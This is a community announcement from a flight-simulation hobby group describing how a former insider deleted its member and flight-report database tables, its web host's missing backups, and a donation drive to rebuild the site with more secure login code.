In short we were hacked by one individual who had inside
knowledge of our database design and our login code. Our login code is quite old
dating back to 2001 so it's vulnerable to some types of attacks. The person who
did this had inside knowledge of our login code and its vulnerabilities. He also
had everyone's login username and password since he had full access to the
database because he was former management. Basically this individual deleted 3
of our most important database tables which included all of our member data and
flight reports.
We were doubly screwed due to our webhost's incompetence.
We were under the impression that our web host was backing up our database as
advertised on a daily, weekly and monthly basis. Come to find out after this
attack that our web host had never backed up our database, not even
once in the past 6-7 years. The attack was bad but the fact that our web host
didn't have any backup of our database hurt more than anything. We have manual
backups of most of our database except for the flight reports database. The
flights database was so big we couldn't open it, much less do a manual backup.
So we were relying on our web host to run server level backups of our database.
Unfortunately they never did. We have very little recourse as their SLA
says they are not responsible for any kind of data loss. They were
nice enough to give us a $50 credit for their incompetence. We returned the
favor by cancelling our service.
The Evidence
So you can see the evidence with your own eyes. This is how
the attack was executed:
Without naming names it's evident who did it. This person also
designed our .php login system. We know it wasn't some random hacker for several
reasons. First one being the attack used AF349s pilot ID. Some random hacker
wouldn't have any idea what a pilot ID was, even less likely take the time to find out
our FTG President's pilot ID. Coincidentally the person who executed this attack
doesn't like AF349, so he tried to frame him. Also a random hacker would not
drop specific tables (which happen to be the 3 most important out of 50+ tables), instead they
would drop the entire database. So thank him for trashing over 8 years of
flight reports. To the hacker, get professional help.
The Future
What lies ahead for FTG? We're not going to let this asshole
betrayal and incompetence finish us. We going to continue enjoying our hobby
with FTG as we have for so many years. First off we've already changed our web
host where we can manually backup our entire database using server backup tools.
The most difficult part will be updating all of our login and
management code with a new database design so this doesn't happen again.
Unfortunately since the hacker designed and coded much of our website we need
to dump that code and start from scratch. We can't take a chance with any
backdoors he may have implemented. This is going to require professional know
how and some time. This is the second time we've been screwed so things are
going to change. We will no longer use volunteers who have full access to our
code or our database. We're going to hire professional programmers to build our
systems with anti-asshole security.
The organization, the layout, multiple websites and our rules
will remain the same as before. We believe this model works well and our members
enjoy what we've built over the years. When the new website is launched all of
our members will be starting from zero.
Call to Action
If you were a member before the attack, enjoyed FTG and
want to see us return better than before you can help by making a donation.
Obviously with this new build model it will require more resources since we're
going to hire real programmers. It may cost more but at least we will see
projects completed much faster than with volunteer work. Hopefully we'll also
have a more professional look to our websites, with nice eye candy, graphs, etc.
With your help we hope to be up and running by this August/September.
To make a donation so we can launch FTG better and stronger
than ever click on the Chipin button below. A big thank you to all of our
members for their understanding & support!
Muchas gracias everyone who chipped in. We've raised $2000
in only a few days. Our goal is to raise between $3000-5000. Work has already
started on the new login code with anti-SQL injection capability. Thanks for all
the support!
